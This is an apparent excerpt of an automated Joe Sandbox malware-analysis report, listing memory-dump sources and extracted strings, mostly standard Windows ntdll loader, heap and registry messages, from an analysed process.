                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 377786BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 3775A7AF
                                          • DGl7, xrefs: 37712382
                                          • LdrpDynamicShimModule, xrefs: 3775A7A5
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3775A79F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DGl7$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2862758056
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          Strings
                                          • LdrpInitializeProcess, xrefs: 3772C5E4
                                          • minkernel\ntdll\ldrinit.c, xrefs: 3772C5E3
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 37767F8C, 37768000
                                          • LdrpInitializeImportRedirection, xrefs: 37767F82, 37767FF6
                                          • Loading import redirection DLL: '%wZ', xrefs: 37767F7B
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 37767FF0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 37761F6F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 37761F82
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 37761FC9
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 37761F8A
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 37761FA9
                                          • RtlGetAssemblyStorageRoot, xrefs: 37761F6A, 37761FA4, 37761FC4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-2283098728
                                          APIs
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 377680E2
                                          • minkernel\ntdll\ldrinit.c, xrefs: 377680F3
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 377680E9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1783798831
                                          APIs
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37774508
                                          • LdrpCheckRedirection, xrefs: 3777450F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 37774519
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 3446177414-3154609507
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          APIs
                                          Strings
                                          • kLsE, xrefs: 376F05FE
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 376F0586
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 3446177414-2547482624
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 8L$8L(
                                          • API String ID: 3446177414-2435122696
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LUl7$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                          • API String ID: 0-1247534402
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          Strings
                                          • @, xrefs: 377284B1
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3772847E
                                          • LdrpInitializeProcess, xrefs: 37728342
                                          • minkernel\ntdll\ldrinit.c, xrefs: 37728341
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 37761FE8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 377620C0
                                          • .Local, xrefs: 377227F8
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 37761FE3, 377620BB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}m7
                                          • API String ID: 0-3235662035
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LUl7$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                          • API String ID: 0-3004382854
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 37750EB5
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 37750E2F
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 37750E72
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 37750DEC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                          • API String ID: 0-1880532218
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                          • API String ID: 0-1168191160
                                          Strings
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 376F1648
                                          • HEAP: , xrefs: 376F14B6
                                          • HEAP[%wZ]: , xrefs: 376F1632
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 37760128
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 377600F1
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 377600C7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                          • API String ID: 0-2391371766
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          Strings
                                          • GlobalizationUserSettings, xrefs: 377CB3B4
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 377CB3AA
                                          • TargetNtPath, xrefs: 377CB3AF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3774E455
                                          • HEAP: , xrefs: 3774E442
                                          • HEAP[%wZ]: , xrefs: 3774E435
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          Strings
                                          • LdrpCompleteMapModule, xrefs: 3775A39D
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3775A396
                                          • minkernel\ntdll\ldrmap.c, xrefs: 3775A3A7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          Strings
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3779D7B2
                                          • HEAP: , xrefs: 3779D79F
                                          • HEAP[%wZ]: , xrefs: 3779D792
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                          • API String ID: 0-1151232445
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 37761954
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37761943
                                          • LdrpAllocateTls, xrefs: 3776194A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          Strings
                                          • @, xrefs: 3777B2F0
                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3777B2B2
                                          • GlobalFlag, xrefs: 3777B30F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                          • API String ID: 0-4192008846
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 3776185B
                                          • DLL "%wZ" has TLS information at %p, xrefs: 3776184A
                                          • LdrpInitializeTls, xrefs: 37761851
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
